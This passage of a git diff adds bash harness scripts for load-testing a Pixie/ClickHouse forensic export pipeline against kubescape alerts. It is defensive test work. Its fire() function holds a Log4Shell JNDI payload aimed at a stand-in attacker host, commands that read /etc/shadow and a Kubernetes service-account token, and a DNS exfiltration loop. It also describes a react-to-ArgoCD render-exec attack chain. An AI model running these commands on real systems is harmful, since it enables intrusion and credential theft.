2>&1 && kubectl -n argocd get application probe-app >/dev/null 2>&1 ;; + react2argo) kubectl get ns react >/dev/null 2>&1 || kubectl -n default get deploy react >/dev/null 2>&1 ;; + esac; } +fire(){ case "$ATTACK" in + log4shell) + local BIP BPORT BP; BIP=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null); BPORT=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null) + kubectl -n attacker-ns exec deploy/attacker -- curl -s -m5 -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true + BP=$(kubectl -n $NS get pods --no-headers 2>/dev/null | awk '/^backend/{print $1;exit}') + [ -n "$BP" ] && kubectl -n $NS exec "$BP" -- sh -c 'whoami; id; cat /etc/shadow 2>/dev/null|head -2; cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null|head -c20; D=$(cat /etc/shadow 2>/dev/null|tr -dc "a-z0-9"|head -c90); i=0; while [ $i -lt 5 ]; do C=$(echo "$D"|cut -c$((i*18+1))-$((i*18+18))); getent hosts "x${C}.exfil.attacker.attacker-ns.svc.cluster.local" >/dev/null 2>&1; i=$((i+1)); done' >/dev/null 2>&1 || true ;; + argocd) + kubectl -n argocd annotate application probe-app argocd.argoproj.io/refresh=hard --overwrite >/dev/null 2>&1 || true; sleep 25 + kubectl -n argocd annotate application probe-app argocd.argoproj.io/refresh=hard --overwrite >/dev/null 2>&1 || true ;; + react2argo) + # (1) react RCE -> steals SA token -> POSTs the malicious argocd Application + # `sys-housekeeping` (sealed trigger, applied verbatim). + kubectl delete job react2shell-trigger -n default --ignore-not-found >/dev/null 2>&1 + kubectl apply -f /tmp/react2argo-trigger.yaml >/dev/null 2>&1 || true + # (2) cache-bust so the render-exec re-fires this rep. The payload is a + # render-exec: argocd-repo-server runs `kustomize build --enable-exec` -> + # ./mal.sh -> reads /etc/shadow (R0001 + R0010 on repo-server) at RENDER + # time. argocd caches rendered manifests in argocd-REDIS; a repo-server + # restart does NOT clear it (verified). Restart argocd-redis to flush the + # manifest cache, then one soft (cache-respecting) reconcile nudge so the + # render re-fires within the rep window. (RCA 2026-06-19.) + kubectl -n argocd rollout restart deploy/argocd-redis >/dev/null 2>&1 + kubectl -n argocd rollout status deploy/argocd-redis --timeout=60s >/dev/null 2>&1 + kubectl -n argocd annotate application sys-housekeeping argocd.argoproj.io/refresh=normal --overwrite >/dev/null 2>&1 || true ;; + esac; } +# acceptance gate: R0001 (unexpected process) seen in the last ~110s (the fire window) +r0001_recent(){ chq "SELECT count() FROM forensic_db.kubescape_logs WHERE RuleID='R0001' AND event_time >= toUInt64((now()-130))*1000000000"; } + +measure(){ local cond=$1 arm=$2 rep=$3 valid=$4 + printf " %-16s %10s %12s\n" table rows bytes | tee -a "$OUT" + while IFS=$'\t' read -r t r b; do [ -z "$t" ] && continue + printf " %-16s %10d %12d\n" "$t" "${r:-0}" "${b:-0}" | tee -a "$OUT" + printf "%s\t%s\t%s\t%s\t%s\t%s\n" "$cond" "$arm" "$rep" "$t" "${r:-0}" "${b:-0}" >> "$RES" + done < <(chq "SELECT table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active GROUP BY table ORDER BY table FORMAT TSV") + say " valid=$valid steered=$(chq "SELECT arrayStringConcat(groupArray(pod),',') FROM (SELECT DISTINCT pod FROM forensic_db.adaptive_attribution WHERE t_end>now())")"; } + +run_arm(){ local cond=$1 arm=$2; shift 2 + say "--- $cond ARM $arm : $* ---" + kubectl -n pl set env ds/adaptive-export "$@" >/dev/null 2>&1 + kubectl -n pl rollout status ds/adaptive-export --timeout=150s >/dev/null 2>&1 + # Wait for AE to actually be Running — `rollout status` can return during the + # restart race; retry before aborting so we don't false-abort a healthy roll. + local _i; for _i in 1 2 3 4 5 6 7 8 9; do ae_ok && break; sleep 10; done + if ! ae_ok; then say " ABORT-arm: AE not Running after rollout+90s wait:"; kubectl -n pl get pods -l name=adaptive-export --no-headers 2>/dev/null|awk '{print " "$1,$3,$4}'|tee -a "$OUT"; return 1; fi + say " AE OK; vizier=$(ensure_healthy)" + local rep t0 g + for rep in $(seq 1 "$REPS"); do + say " $cond $arm rep$rep"; truncate_all; ensure_healthy >/dev/null + t0=$(date +%s); while [ $(( $(date +%s) - t0 )) -lt "$FIREAT" ]; do sleep 2; done + say " FIRE $ATTACK"; fire + while [ $(( $(date +%s) - t0 )) -lt "$RUNSEC" ]; do sleep 2; done; sleep 15 + g=$(r0001_recent); g=${g:-0}; [ "$g" -gt 0 ] && valid=yes || valid="NO(r0001=0)" + measure "$cond" "$arm" "$rep" "$valid" + if [ "$rep" -lt "$REPS" ]; then say " settle ${GAP}s"; sleep "$GAP"; fi + done; return 0; } + +say "===== MATRIX START conds=[$CONDS] REPS=$REPS =====" +for c in $CONDS; do + ATTACK=${c%%:*}; NZ=${c##*:} + say "===== CONDITION $ATTACK noise=$NZ =====" + if ! ready; then say " SKIP — $ATTACK workload not deployed"; continue; fi + noise "$NZ"; sleep 20 + run_arm "$ATTACK/$NZ" ALL ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_PASSTHROUGH_WINDOW_SEC=60 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=60 || continue + say " inter-arm settle ${GAP}s"; sleep "$GAP" + run_arm "$ATTACK/$NZ" DX ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_STREAM_WINDOW_SEC=60 ADAPTIVE_STREAM_REFRESH_SEC=60 || continue + noise off + say " inter-condition settle ${GAP}s"; sleep "$GAP" +done + +say "===== SUMMARY (mean rows over valid reps, per condition/arm) =====" +for c in $CONDS; do for arm in ALL DX; do for t in http_events dns_events conn_stats pgsql_events; do + m=$(awk -F'\t' -v C="${c%%:*}/${c##*:}" -v A=$arm -v T=$t '$1==C&&$2==A&&$4==T{s+=$5;n++} END{if(n)printf "%.0f",s/n; else print 0}' "$RES") + [ "$m" != 0 ] && say " $c $arm $t mean_rows=$m" +done; done; done +say "===== MATRIX DONE =====" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh new file mode 100755 index 00000000000..a755d783b72 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_row_reconcile.sh @@ -0,0 +1,127 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_row_reconcile.sh — DETERMINISTIC row-level PEM↔CH reconciliation for AE. +# +# WHY: count(CH) >= count(PEM) ("write ⊇ read") is NOT proof — CH can be inflated by +# re-pull dups (C8) while silently MISSING specific rows PEM has. This test proves +# identity at ROW granularity: every individual row Pixie captured (PEM) was written +# to forensic_db (CH) with matching values — no loss, no fabrication. +# +# HOW: Pixie protocol rows have no native UUID, so we MINT one. Each request carries a +# unique probe id - in its URL → that string is the row's deterministic UUID, +# visible in http_events.req_path on BOTH sides. We then compare the SET of (uuid|method| +# status) fingerprints from PEM vs CH. This cleanly separates two layers: +# expected (0..N-1) --Pixie capture--> PEM set --AE fidelity--> CH set +# - expected \ PEM = Pixie/eBPF didn't capture it (Pixie property, NOT AE) +# - PEM \ CH = AE LOST a row Pixie had (← the AE bug we hunt; must be empty) +# - CH \ PEM = AE FABRICATED a row Pixie lacked (must be empty; dups are same uuid, not new) +# - mismatched fingerprint for same uuid = value corruption (shows as both loss+fab) +# +# PASS ⇔ (PEM \ CH) empty AND (CH \ PEM) empty. Runs NODE-SIDE (kubectl + px local). +set -uo pipefail +N=${N:-300}; NS=${NS:-log4j-poc}; SVC=${SVC:-frontend} +CLUSTER=${CLUSTER:-547d0a15-4004-435e-aea1-c13e596eb976} +CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0} +SETTLE=${SETTLE:-180} # > two passthrough sweeps (~80s each) + write +O=/tmp/rowrec; mkdir -p "$O" +chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; } +# pxrun relies on the persisted `px auth login` session (auth.json); PX_CLOUD_ADDR is non-secret. +pxrun(){ PX_CLOUD_ADDR="$(grep -E '^PX_CLOUD_ADDR=' /tmp/pixie-keys.env 2>/dev/null | cut -d= -f2-)"; export PX_CLOUD_ADDR + px run -f "$1" -c "$CLUSTER" 2>&1 | grep -ivE "PX_|ENV VARS|^\*|Pixie CLI|Cloud|^$|resump"; } + +FE=$(kubectl -n "$NS" get svc "$SVC" -o jsonpath='{.spec.clusterIP}') +FEPOD_NSP="$NS/$(kubectl -n "$NS" get pods -l app="$SVC" -o jsonpath='{.items[0].metadata.name}' 2>/dev/null)" +[ "$FEPOD_NSP" = "$NS/" ] && FEPOD_NSP="$NS/$(kubectl -n "$NS" get pods --no-headers 2>/dev/null | awk '/^'"$SVC"'/{print $1; exit}')" +TAG="rr$(date +%s)" # unique run tag → isolates THIS run's rows (clock-skew-proof) +echo "TAG=$TAG N=$N target=$FEPOD_NSP fe=$FE" | tee "$O/meta.txt" + +# 0. Put AE in passthrough so it captures the frontend (write-fidelity test, not gating). +kubectl -n pl set env ds/adaptive-export ADAPTIVE_PASSTHROUGH=true ADAPTIVE_PASSTHROUGH_WINDOW_SEC=240 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=20 ADAPTIVE_PUSH_PIXIE_ROWS=false >/dev/null 2>&1 +kubectl -n pl rollout status ds/adaptive-export --timeout=140s >/dev/null 2>&1 +sleep 40 # AE reconnect warm + +# 1. Fire N uniquely-tagged requests from a gen pod (gen client may be untraced; we read +# the TRACED frontend SERVER-side, so every request shows up as one http_events row). +kubectl -n "$NS" delete pod rowgen --ignore-not-found --wait=true >/dev/null 2>&1 +kubectl -n "$NS" run rowgen --image=busybox:1.36 --restart=Never --command -- \ + sh -c "for i in \$(seq 0 $((N-1))); do wget -qO- 'http://$FE/api/products?probe=$TAG-'\$i >/dev/null 2>&1; done; echo ROWGEN_DONE; sleep 3600" +for _ in $(seq 1 90); do kubectl -n "$NS" logs rowgen 2>/dev/null | grep -q ROWGEN_DONE && break; sleep 2; done +echo "fired $N requests; settling ${SETTLE}s for AE to sweep+write" | tee -a "$O/meta.txt" +sleep "$SETTLE" + +# 2. PEM fingerprints: (uuid|method|status) Pixie captured for the frontend, filtered by TAG. +cat > "$O/pem.pxl" < "$O/pem.raw" +# Build fingerprint uuid|method|status; req_path carries the uuid, no spaces in any field. +awk -v tag="$TAG" ' + { for(i=1;i<=NF;i++){ if($i ~ tag"-[0-9]+"){ uuid=$i; sub(/^.*(/tag"-[0-9]+/).*/,"",uuid) } } }' /dev/null 2>/dev/null +grep -oE "$TAG-[0-9]+" "$O/pem.raw" | sort -u > "$O/pem.uuids" +# fingerprint with method+status (parse columns around the probe token) +python3 - "$O/pem.raw" "$TAG" > "$O/pem.fp" <<'PY' +import sys,re +tag=sys.argv[2] +seen=set() +for ln in open(sys.argv[1]): + m=re.search(re.escape(tag)+r"-(\d+)",ln) + if not m: continue + meth=("GET" if " GET " in " "+ln+" " or "GET" in ln else "?") + st=re.search(r"\b([1-5]\d\d)\b",ln); st=st.group(1) if st else "?" + seen.add(f"{tag}-{m.group(1)}|{meth}|{st}") +print("\n".join(sorted(seen))) +PY + +# 3. CH fingerprints: what AE actually wrote (distinct, dedup'd) for the same TAG. +chq "SELECT DISTINCT concat(extract(req_path,'($TAG-[0-9]+)'),'|',req_method,'|',toString(resp_status)) + FROM forensic_db.http_events + WHERE pod='$FEPOD_NSP' AND req_path LIKE '%$TAG-%' + ORDER BY 1 FORMAT TSV" 2>/dev/null | grep -E "$TAG-[0-9]+\|" | sort -u > "$O/ch.fp" +grep -oE "$TAG-[0-9]+" "$O/ch.fp" | sort -u > "$O/ch.uuids" +CH_TOTAL=$(chq "SELECT count() FROM forensic_db.http_events WHERE pod='$FEPOD_NSP' AND req_path LIKE '%$TAG-%'") + +# 4. Reconcile. +seq 0 $((N-1)) | sed "s/^/$TAG-/" | sort -u > "$O/expected.uuids" +LOSS=$(comm -23 "$O/pem.fp" "$O/ch.fp" | wc -l) # in PEM not CH = AE LOST (must be 0) +FAB=$(comm -13 "$O/pem.fp" "$O/ch.fp" | wc -l) # in CH not PEM = AE FABRICATED/value-mismatch (must be 0) +MATCH=$(comm -12 "$O/pem.fp" "$O/ch.fp" | wc -l) +PIXIE_MISS=$(comm -23 "$O/expected.uuids" "$O/pem.uuids" | wc -l) # Pixie didn't capture (NOT AE) +PEM_U=$(wc -l < "$O/pem.uuids"); CH_U=$(wc -l < "$O/ch.uuids") +DUP="n/a"; [ "$CH_U" -gt 0 ] && DUP=$(awk "BEGIN{printf \"%.2f\", $CH_TOTAL/$CH_U}") + +{ +echo "================ ROW-LEVEL RECONCILE (TAG=$TAG, N=$N) ================" +echo "Pixie captured (PEM distinct uuids): $PEM_U / $N (expected\\PEM = $PIXIE_MISS not captured by eBPF)" +echo "AE wrote (CH distinct uuids): $CH_U (CH total rows=$CH_TOTAL → dup factor ${DUP}x)" +echo "fingerprint matched (uuid|method|status): $MATCH" +echo "AE LOSS (PEM\\CH, MUST be 0): $LOSS" +echo "AE FAB (CH\\PEM, MUST be 0): $FAB" +[ "$LOSS" -gt 0 ] && { echo '--- LOST rows (Pixie had, AE did NOT write): ---'; comm -23 "$O/pem.fp" "$O/ch.fp" | head -20; } +[ "$FAB" -gt 0 ] && { echo '--- FABRICATED/mismatched rows (in CH, not in PEM): ---'; comm -13 "$O/pem.fp" "$O/ch.fp" | head -20; } +if [ "$LOSS" -eq 0 ] && [ "$FAB" -eq 0 ] && [ "$PEM_U" -gt 0 ]; then + echo "VERDICT: PASS — every row Pixie captured was written to CH with matching values." +else + echo "VERDICT: FAIL — AE write-set != Pixie read-set at row granularity." +fi +} | tee "$O/RESULT.txt" +kubectl -n "$NS" delete pod rowgen --ignore-not-found --wait=false >/dev/null 2>&1 diff --git a/src/e2e_test/adaptive_export_loadtest/harness/inject.sh b/src/e2e_test/adaptive_export_loadtest/harness/inject.sh new file mode 100755 index 00000000000..df6de5219c1 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/inject.sh @@ -0,0 +1,109 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# inject.sh — inject controlled kubescape_logs trigger rows into ClickHouse over +# the HTTP interface, with EXACT control over event_time. This is the only AE +# input under test: real kubescape is NOT deployed for these load-tests. +# +# Row shape mirrors exactly what Vector emits (and what AE's trigger polls): +# BaseRuntimeMetadata, CloudMetadata, RuleID, RuntimeK8sDetails (JSON string +# with podName/podNamespace), RuntimeProcessDetails (JSON string with +# processTree.pid/comm), event, event_time (UInt64 unix-NANOS), hostname. +# +# anomaly_hash = SHA256(pid, comm, pod, namespace)[:16] is computed by AE — NOT +# set here — so per-rep uniqueness comes from a unique --pod (data plane) and a +# unique --hostname (control plane; trigger_watermark is partitioned by host). +# +# Timestamp discipline (PRODUCTION UNIT = SECONDS): +# event_time is unix SECONDS — the unit the soc Vector kubescape sink emits +# (`to_unix_timestamp(ts)`, VRL default seconds) and what the CH DDL's +# `toDateTime(event_time)` TTL/PARTITION assume. (The AE trigger auto-detects +# s/ms/ns, but the DDL only handles seconds — so fixtures MUST be seconds or +# the rows are TTL-deleted; see FINDINGS_AND_BACKLOG.md F1/AE-2.) +# --event-time is the FIRST row's event_time (unix SECONDS). With --count N>1 +# the rows get event_time, event_time+dt, ... (--dt-s, default 1s) so they are +# DISTINCT + monotone and never collide at the watermark boundary — UNLESS +# --same-time is given, which deliberately reuses one event_time to exercise +# the boundary-fingerprint dedup (experiment E4). +set -euo pipefail + +ENDPOINT="${CH_ENDPOINT:-http://localhost:8123}" +CH_USER="${CH_USER:-}" +CH_PASS="${CH_PASS:-}" +NS="" ; POD="" ; RULE="R0001" ; PID="1234" ; COMM="java" +EVENT_TIME="" ; HOSTNAME_="" ; COUNT=1 ; DT_S=1 ; SAME_TIME=0 +ALERT="" + +usage(){ grep '^#' "$0" | sed 's/^# \{0,1\}//' ; exit "${1:-0}"; } + +while [[ $# -gt 0 ]]; do + case "$1" in + --endpoint) ENDPOINT="$2"; shift 2;; + --user) CH_USER="$2"; shift 2;; + --pass) CH_PASS="$2"; shift 2;; + --ns) NS="$2"; shift 2;; + --pod) POD="$2"; shift 2;; + --rule) RULE="$2"; shift 2;; + --pid) PID="$2"; shift 2;; + --comm) COMM="$2"; shift 2;; + --event-time) EVENT_TIME="$2"; shift 2;; + --hostname) HOSTNAME_="$2"; shift 2;; + --count) COUNT="$2"; shift 2;; + --dt-s) DT_S="$2"; shift 2;; + --same-time) SAME_TIME=1; shift;; + --alert) ALERT="$2"; shift 2;; + -h|--help) usage 0;; + *) echo "inject.sh: unknown arg $1" >&2; usage 1;; + esac +done + +[[ -n "$NS" && -n "$POD" && -n "$EVENT_TIME" && -n "$HOSTNAME_" ]] || { + echo "inject.sh: --ns --pod --event-time --hostname are required" >&2; exit 2; } +[[ -n "$ALERT" ]] || ALERT="$RULE" + +# Build the JSONEachRow body. RuntimeK8sDetails / RuntimeProcessDetails are +# JSON-STRING columns, so their inner quotes are escaped (\"). event_time is +# unix SECONDS; --count rows step by DT_S seconds (distinct, monotone). +body="" +for ((i=0; i&2 + cat /tmp/inject_resp.$$ >&2 || true + rm -f /tmp/inject_resp.$$ + exit 1 +fi +rm -f /tmp/inject_resp.$$ +echo "inject.sh: OK count=${COUNT} ns=${NS} pod=${POD} rule=${RULE} host=${HOSTNAME_} t0=${EVENT_TIME} same_time=${SAME_TIME}" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/lib.sh b/src/e2e_test/adaptive_export_loadtest/harness/lib.sh new file mode 100755 index 00000000000..680b694975a --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/lib.sh @@ -0,0 +1,216 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# lib.sh — shared helpers for the AE fixture-isolation load-tests (L3, live rig). +# +# Connectivity model (per the labctl-session-discipline rule): all kubectl runs +# LOCALLY over the tailscale-direct kubeconfig (make kubeconfig), and ClickHouse +# is reached over a local port-forward — NO long-held labctl ssh sessions. +# +# Required env (export before sourcing or pass through): +# KUBECONFIG tailscale-direct kubeconfig for the rig (make kubeconfig) +# AELOAD_IMAGE ttl.sh/aeload-:24h (built on the PG dev-machine) +# Optional: +# CH_NS (default clickhouse), AE_NS (default pl), AELOAD_NS (default aeload) +# CH_HTTP (default http://127.0.0.1:8123 via the port-forward this lib opens) +# CH_RO_USER / CH_RO_PASS (SELECT creds; default = empty → default user) +# CH_RW_USER / CH_RW_PASS (INSERT creds; default ingest_writer/changeme-ingest) +set -uo pipefail + +CH_NS="${CH_NS:-clickhouse}" +AE_NS="${AE_NS:-pl}" +AELOAD_NS="${AELOAD_NS:-aeload}" +CH_HTTP="${CH_HTTP:-http://127.0.0.1:8123}" +CH_RO_USER="${CH_RO_USER:-}" +CH_RO_PASS="${CH_RO_PASS:-}" +CH_RW_USER="${CH_RW_USER:-ingest_writer}" +CH_RW_PASS="${CH_RW_PASS:-changeme-ingest}" +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +K8S_DIR="$(cd "$HERE/../k8s" && pwd)" + +_PF_PID="" + +die(){ echo "[aeload] FATAL: $*" >&2; exit 1; } +log(){ echo "[aeload] $*" >&2; } + +# k — kubectl over the tailscale kubeconfig. +k(){ kubectl "$@"; } + +# ch_svc — resolve the ClickHouse service name (first svc exposing 8123). +ch_svc(){ + k -n "$CH_NS" get svc -o jsonpath='{range .items[*]}{.metadata.name}{" "}{.spec.ports[*].port}{"\n"}{end}' \ + | awk '/8123/{print $1; exit}' +} + +# ch_portforward_up — start a background port-forward 8123 -> CH HTTP. +# Set CH_NO_PF=1 when running LAB-SIDE (on the PG dev-machine): there kubectl is +# native and ClickHouse is reachable in-cluster, so point CH_HTTP straight at the +# service (e.g. http://..svc:8123) and skip the forward entirely. This +# is the disciplined path — no long-held labctl ssh / no tailnet dependency. +ch_portforward_up(){ + if [[ "${CH_NO_PF:-0}" == "1" ]]; then + # Auto-fill CH_HTTP from the in-cluster service if left at the default. + if [[ "$CH_HTTP" == "http://127.0.0.1:8123" ]]; then + local svc; svc="$(ch_svc)"; [[ -n "$svc" ]] || die "no ClickHouse svc exposing 8123 in ns $CH_NS" + CH_HTTP="http://${svc}.${CH_NS}.svc:8123" + fi + log "lab-side mode: CH_HTTP=$CH_HTTP (no port-forward)" + curl -fsS "$CH_HTTP/ping" >/dev/null 2>&1 || die "CH not reachable at $CH_HTTP" + return 0 + fi + local svc; svc="$(ch_svc)"; [[ -n "$svc" ]] || die "no ClickHouse svc exposing 8123 in ns $CH_NS" + log "port-forward svc/$svc 8123 (ns $CH_NS)" + k -n "$CH_NS" port-forward "svc/$svc" 8123:8123 >/tmp/aeload-pf.log 2>&1 & + _PF_PID=$! + for _ in $(seq 1 30); do + curl -fsS "$CH_HTTP/ping" >/dev/null 2>&1 && { log "port-forward ready"; return 0; } + sleep 0.5 + done + die "port-forward to CH did not become ready (see /tmp/aeload-pf.log)" +} +ch_portforward_down(){ [[ -n "$_PF_PID" ]] && kill "$_PF_PID" 2>/dev/null || true; } +trap ch_portforward_down EXIT + +# chq — run a read query, return the raw result (default user / RO creds). +chq(){ + local sql="$1" auth=() + [[ -n "$CH_RO_USER" ]] && auth=(-u "${CH_RO_USER}:${CH_RO_PASS}") + curl -sS "${auth[@]}" --data-binary "$sql" "$CH_HTTP/" 2>/dev/null +} + +# count_pod — rows for this rep's pod (globally-unique pod +# name → safe LIKE). Returns an integer (0 if table/rows absent). +count_pod(){ + local table="$1" uniq="$2" + local n; n="$(chq "SELECT count() FROM forensic_db.${table} WHERE pod LIKE '%${uniq}%'" )" + echo "${n:-0}" | tr -dc '0-9' | head -c 18 +} + +# NOTE: the live AE DaemonSet polls kubescape_logs WHERE hostname=, +# so every injected fixture's hostname MUST be a real node. Per-rep isolation is +# therefore by UNIQUE POD (distinct anomaly_hash), not by hostname. The helpers +# below scope to (hostname=node, pod LIKE the rep's unique pod). adaptive_ +# attribution stores the BARE pod name (kubescape podName), unlike the protocol +# tables whose pod is "/" (upid_to_pod_name). + +# attrib_count — adaptive_attribution rows (FINAL) for a rep. +attrib_count(){ + local node="$1" pod="$2" n + n="$(chq "SELECT count() FROM (SELECT 1 FROM forensic_db.adaptive_attribution FINAL WHERE hostname='${node}' AND pod LIKE '%${pod}%')")" + echo "${n:-0}" | tr -dc '0-9' | head -c 18 +} +uniq_hashes(){ + local node="$1" pod="$2" n + n="$(chq "SELECT uniqExact(anomaly_hash) FROM forensic_db.adaptive_attribution WHERE hostname='${node}' AND pod LIKE '%${pod}%'")" + echo "${n:-0}" | tr -dc '0-9' | head -c 18 +} +# watermark_of — current trigger watermark for that node (monotone across +# reps that share a node; equals the most-recently-injected event_time). +watermark_of(){ + local node="$1" n + n="$(chq "SELECT watermark FROM forensic_db.trigger_watermark FINAL WHERE hostname='${node}' AND table_name='kubescape_logs'")" + echo "${n:-0}" | tr -dc '0-9' | head -c 20 +} + +# attr_field — read one adaptive_attribution FINAL +# column (e.g. n_anomalies, toUnixTimestamp(last_seen)) for a single pod. +attr_field(){ + local node="$1" pod="$2" field="$3" n + n="$(chq "SELECT ${field} FROM forensic_db.adaptive_attribution FINAL WHERE hostname='${node}' AND pod='${pod}'")" + echo "${n:-0}" | tr -dc '0-9' | head -c 20 +} + +# first_node — a real schedulable node name (fixture hostname for control-plane +# experiments). nodes_list — all node names, newline-separated. +nodes_list(){ k get nodes -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}'; } +first_node(){ nodes_list | head -n1; } + +# now_ns — wall-clock unix nanoseconds (unique-name suffix only). +now_ns(){ date +%s%N; } +# now_s — wall-clock unix SECONDS = the production event_time unit (soc Vector +# emits seconds; the CH DDL TTL/PARTITION assume seconds). ALL fixtures use this. +now_s(){ date +%s; } + +# warmup — absorb the AE trigger cold-start on a node. The very first +# poll after AE boots only establishes the watermark baseline, so the first +# real event for a fresh hostname can be missed; a throwaway injection + +# settle primes the per-node trigger so measured reps are steady-state. +warmup(){ + local node="$1" inject="$HERE/inject.sh" + log "warmup trigger on node=$node" + "$inject" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \ + --hostname "$node" --ns aeload --pod "warmup-$(now_ns)" --rule R0001 \ + --pid 999 --comm warmup --event-time "$(now_s)" >&2 || true + sleep "${WARMUP_SETTLE_S:-6}" +} + +# wait_attrib [timeout_s] — poll adaptive_attribution +# FINAL until it reaches (AE's 250ms poll + write can lag a few seconds; +# a fixed sleep occasionally under-waited). Echoes the final observed count. +wait_attrib(){ + local node="$1" pod="$2" want="$3" to="${4:-20}" n=0 + for _ in $(seq 1 "$to"); do + n="$(attrib_count "$node" "$pod")" + [[ "${n:-0}" -ge "$want" ]] && break + sleep 1 + done + echo "${n:-0}" +} + +# svc_ip — ClusterIP of an aeload service (literal IP for the generator). +svc_ip(){ k -n "$AELOAD_NS" get svc "$1" -o jsonpath='{.spec.clusterIP}'; } + +# apply_sinks — bring up the shared aeload ns + http-sink + pg-sink (idempotent). +apply_sinks(){ + [[ -n "${AELOAD_IMAGE:-}" ]] || die "AELOAD_IMAGE not set" + sed "s#__IMAGE__#${AELOAD_IMAGE}#g" "$K8S_DIR/00-sinks.yaml" | k apply -f - + k -n "$AELOAD_NS" rollout status deploy/http-sink --timeout=120s + k -n "$AELOAD_NS" rollout status deploy/pg-sink --timeout=120s +} + +# fire_gen — create a gen pod, wait for it +# to fire, echo its one-line JSON manifest. Leaves the pod RUNNING (held). +fire_gen(){ + local name="$1" hn="$2" dn="$3" pn="$4" + local hip pip + hip="$(svc_ip http-sink)"; pip="$(svc_ip pg-sink)" + [[ -n "$hip" && -n "$pip" ]] || die "could not resolve sink ClusterIPs" + # GEN_SETTLE_MS: pre-band warm-up so Pixie/Stirling attaches BEFORE the exact + # band (exact-count tests). GEN_SUSTAIN_SEC: continuous trickle AFTER the band + # (sustained "keep writing until t_end" RCA). Defaults suit exact-count runs. + sed -e "s#__NAME__#${name}#g" -e "s#__IMAGE__#${AELOAD_IMAGE}#g" \ + -e "s#__HTTP_ADDR__#${hip}:8080#g" -e "s#__PG_ADDR__#${pip}:5432#g" \ + -e "s#__HTTP_N__#${hn}#g" -e "s#__DNS_N__#${dn}#g" -e "s#__PGSQL_N__#${pn}#g" \ + -e "s#__SETTLE_PRE_MS__#${GEN_SETTLE_MS:-30000}#g" -e "s#__SUSTAIN_SEC__#${GEN_SUSTAIN_SEC:-0}#g" \ + "$K8S_DIR/gen-pod.tmpl.yaml" | k apply -f - >&2 + # Wait for the FIRED sentinel + grab the manifest line (allow for the warm-up). + local mani="" + for _ in $(seq 1 90); do + if k -n "$AELOAD_NS" logs "$name" 2>/dev/null | grep -q AELOAD_FIRED; then + mani="$(k -n "$AELOAD_NS" logs "$name" 2>/dev/null | grep AELOAD_MANIFEST | tail -1 | sed 's/^AELOAD_MANIFEST //')" + break + fi + sleep 1 + done + [[ -n "$mani" ]] || die "gen $name never fired (logs:)\n$(k -n "$AELOAD_NS" logs "$name" 2>/dev/null | tail -20)" + echo "$mani" +} +del_gen(){ k -n "$AELOAD_NS" delete pod "$1" --grace-period=2 --wait=false >/dev/null 2>&1 || true; } + +# jget — tiny JSON field reader (numbers/strings) via python3. +jget(){ python3 -c 'import json,sys;print(json.load(sys.stdin)[sys.argv[1]])' "$2" <<<"$1"; } diff --git a/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh b/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh new file mode 100755 index 00000000000..7cd7ba7b619 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh @@ -0,0 +1,83 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF 